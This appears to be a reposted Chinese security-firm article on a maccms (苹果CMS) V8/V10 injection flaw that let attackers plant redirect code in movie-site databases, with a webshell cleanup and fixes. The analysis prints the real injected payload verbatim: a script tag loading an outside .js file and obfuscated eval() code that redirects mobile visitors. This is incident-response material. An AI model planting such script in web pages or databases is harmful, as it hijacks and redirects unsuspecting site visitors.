返回顶部
首页 > 资讯 > 精选 >苹果maccms最新漏洞补丁是什么
  • 435
分享到

苹果maccms最新漏洞补丁是什么

2023-06-03 16:06:49 435人浏览 八月长安
摘要

苹果Maccms最新漏洞补丁是什么,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。2020年刚开始,苹果CMS被爆出数据库代码执行漏洞,大量的电影网站被挂马,尤其电影的页面被

苹果Maccms最新漏洞补丁是什么,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。

2020年刚开始,苹果CMS被爆出数据库代码执行漏洞,大量的电影网站被挂马,尤其电影的页面被篡改植入了恶意代码,数据库中的VOD表里的d_name被全部修改,导致网站打开后直接跳转到S站或者弹窗广告,目前该maccms漏洞受影响的苹果系统版本是V8,V10,很多客户网站被反复篡改,很无奈,通过朋友介绍找到我们SINE安全寻求技术上支持,防止网站被挂马。根据客户的反应,服务器采用的是linux Centos系统,苹果CMS版本是最新的V10版本,我们立即成立网站安全应急响应处理,帮助客户解决网站被攻击的问题。

首先很多站长以为升级了苹果CMS官方最新的漏洞补丁就没问题了,通过我们SINE安全技术对补丁的代码安全分析发现,该漏洞补丁对当前的数据库代码执行漏洞是没有任何效果的,于事无补,网站还会继续被攻击。

我们来看下客户网站目前发生的挂马问题,打开网站首页以及各个电影地址都会被插入挂马代码,如下图所示:

苹果maccms最新漏洞补丁是什么

打包压缩了一份网站源代码,以及Nginx网站日志文件,我们SINE安全工程师在根目录下发现被上传了网站WEBshell木马文件,通过网站日志溯源追踪我们查看到访问这个PHP脚本木马文件的是一个韩国的IP,具体的代码如下图:

苹果maccms最新漏洞补丁是什么

代码做了加密处理,我们SINE安全对其解密发现该代码的功能可以对网站进行上传,下载,修改代码,操作数据库等功能,属于php大马的范畴,也叫webshell木马文件,我们又对苹果CMS的源代码进行了人工安全审计,发现index.php代码对搜索模块上做的一些恶意代码过滤检查存在漏洞,可导致攻击者绕过安全过滤,直接将sql插入代码执行到数据库当中去。

我们对数据库进行安全检测发现,在VOD表的d_name被批量植入了挂马代码:

<script src=https://www.kilin.xyz/1.js>

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(newPRegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('4.5(\'<61="3/2" 7="//0.b.c.d/8.0"><\\/9\'+\'a>\');',14,14,'js|type|javascript|text|document|write|script|src|20487493|scr|ipt|users|51|la'.split('|'),0,{}));var LOUMtBZeW=navigator["userAgent"]["toLowerCase"]()["match"](/(ipod|iphone|ipad|Android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null;if(LOUMtBZeW){setTimeout('window.location.href="Https://m.qiche-hangjia.com:168/ua80666/"',500)}

这手法很专业,不是一般的攻击者所为,针对手机端做了跳转以及隐藏嵌入,让网站运营者根本无法察觉发现,还判断了cookies来路,达到条件才能触发攻击者植入的广告代码。继续安全分析与追踪,发现了攻击者的手法,POST提交到/index.php?m=vod-search,POST内容是加密的这里就不方便发出了,属于漏洞攻击了,可能会给其他使用苹果CMS系统的网站造成攻击,我们SINE安全技术对POST攻击代码进行了解密分析,发现确实是绕过了苹果官方V8,V10系统的代码安全过滤,直接将挂马代码插入到了数据库里了。

苹果maccms最新漏洞补丁是什么

问题根源找到了,接下来我们对客户的苹果CMS漏洞进行修复,对POST提交过来的参数进行严格的过滤与转义,对vod-search含有的恶意字符进行强制转换,对恶意代码进行安全拦截,防止传入到后端进行数据库里的代码执行。对网站代码里存在的木马后门进行了全面的人工审计与检查,共计发现5个后门,其余的在缓存目录当中,跟程序代码混淆在一起,也都删除了,对网站的后台地址进行了更改,之前后台使用的地址被攻击者掌握,对管理员的账号密码进行了加强,至此苹果CMS网站被挂马的问题才得以彻底解决,如果您的maccms也被一直挂马,自己懂代码的话可以对POST到index.php的数据进行安全拦截与检查,防止恶意代码的插入,如果不是太懂的话,建议找专业的网站安全公司来处理解决。

关于苹果maccms最新漏洞补丁是什么问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注编程网精选频道了解更多相关知识。

--结束END--

本文标题: 苹果maccms最新漏洞补丁是什么

本文链接: https://lsjlt.com/news/234834.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
  • 苹果maccms最新漏洞补丁是什么
    苹果maccms最新漏洞补丁是什么,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。2020年刚开始,苹果CMS被爆出数据库代码执行漏洞,大量的电影网站被挂马,尤其电影的页面被...
    99+
    2023-06-03
  • win10最新漏洞如何更新补丁
    这篇文章主要讲解了“win10最新漏洞如何更新补丁”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“win10最新漏洞如何更新补丁”吧! 在这里小编提供了两种方法: 一、根据微软桌面的...
    99+
    2023-07-02
  • win10最新漏洞补丁如何卸载
    这篇文章主要讲解了“win10最新漏洞补丁如何卸载”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“win10最新漏洞补丁如何卸载”吧!win10最新漏洞补丁卸载一、如果在补丁安装前有过系统备份...
    99+
    2023-07-01
  • win10最新漏洞补丁不更新怎么解决
    本文小编为大家详细介绍“win10最新漏洞补丁不更新怎么解决”,内容详细,步骤清晰,细节处理妥当,希望这篇“win10最新漏洞补丁不更新怎么解决”文章能帮助大家解决疑惑,下面跟着小编的思路慢慢深入,一起来学习新知识吧。一、手动下载安装更新 ...
    99+
    2023-07-01
  • dedecms最新高危漏洞 建议用户及时更新漏洞补丁
    用我们提供的查马软件 整个站点查杀下  光更新补丁是没有用的 如你的站点被入侵 肯定会被挂马  建议先按照官方网站提示的 将dedecms安全设置第一篇 dedecms中将系统的data目录迁移到we...
    99+
    2022-06-12
    高危漏洞
  • 全网最新Log4j 漏洞修复和临时补救方法是什么
    这篇文章给大家介绍全网最新Log4j 漏洞修复和临时补救方法是什么,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。1. 漏洞评级及影响版本Apache Log4j 远程代码执行漏洞 严重影响的版本范围:Apac...
    99+
    2023-06-22
  • 电脑KB4535996补丁新bug问题是什么
    这篇文章主要介绍“电脑KB4535996补丁新bug问题是什么”的相关知识,小编通过实际案例向大家展示操作过程,操作方法简单快捷,实用性强,希望这篇“电脑KB4535996补丁新bug问题是什么”文章能帮助大家解决问题。KB4535996补...
    99+
    2023-07-01
  • 苹果CMS d_name值漏洞EXP挂马的解决办法是什么
    今天就跟大家聊聊有关苹果CMS d_name值漏洞EXP挂马的解决办法是什么,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。苹果CMS漏洞是越来越多了,国内很多电影网站都使用的是mac...
    99+
    2023-06-03
  • 针对PHP对象注入漏洞的新型利用方法是什么
    本篇文章为大家展示了针对PHP对象注入漏洞的新型利用方法是什么,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。前言就在前段时间的BlackHat黑客大会上,来自Secarma的安全研究专家Sam Th...
    99+
    2023-06-04
  • 最便宜的云服务器主机品牌是什么意思啊苹果
    苹果的云服务器主机品牌包括Amazon Web Services、Google Cloud Platform以及Apple Cloud Drive。其中Amazon Web Services(AWS)是苹果云服务中最为流行的品牌之一,提供各...
    99+
    2023-10-26
    最便宜 苹果 主机
  • 最便宜的云服务器主机品牌是什么意思呀苹果
    AWS(Amazon Web Services):AWS是最常见的云服务器主机品牌之一,也是最受欢迎的品牌之一。AWS提供各种类型的云服务器,包括IaaS、PaaS和SaaS,并且可以根据您的需求定制配置。价格较为实惠,但相对来说,其可靠...
    99+
    2023-10-28
    最便宜 苹果 主机
  • 最便宜的云服务器主机配置是什么意思呀苹果
    首先,一个最便宜的云服务器主机配置应该是具备高性能的硬件配置。比如,服务器应该具备至少8核CPU、2G内存、512GB存储空间等,这样可以保证服务器在运行时具备强大的处理能力和数据处理能力。 其次,一个最便宜的云服务器主机配置应该具备高可...
    99+
    2023-10-28
    最便宜 苹果 主机
  • 最便宜的云服务器主机品牌是什么意思呀苹果11
    阿里云 阿里云是国内最大的云计算服务提供商之一,提供全球化的云计算解决方案和技术支持。它的云服务器主机产品价格相对较为实惠,可以满足中小型企业和个人用户的需求。此外,阿里云的云服务器主机还支持多种数据存储和备份方式,非常适合数据敏感的...
    99+
    2023-10-28
    最便宜 苹果 主机
  • 最便宜的云服务器主机品牌是什么意思呀苹果11款
    亚马逊AWS(Amazon Web Services):亚马逊AWS是全球最大的云计算提供商之一,提供广泛的云计算服务,包括计算、存储、数据库、分析、人工智能等。它提供的主机可以按照使用量和价格来定价,非常适合预算有限的用户。 谷歌云平台...
    99+
    2023-10-28
    最便宜 苹果 主机
  • 最便宜的云服务器主机品牌是什么意思啊苹果电脑
    AWS(Amazon Web Services) AWS是全球最大的云服务提供商之一,提供多种云服务,包括计算、存储、数据库、人工智能、机器学习等。AWS的最便宜的云服务器主机品牌可能是AWS Liana(阿里云)。AWS Liana...
    99+
    2023-10-28
    最便宜 苹果电脑 主机
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作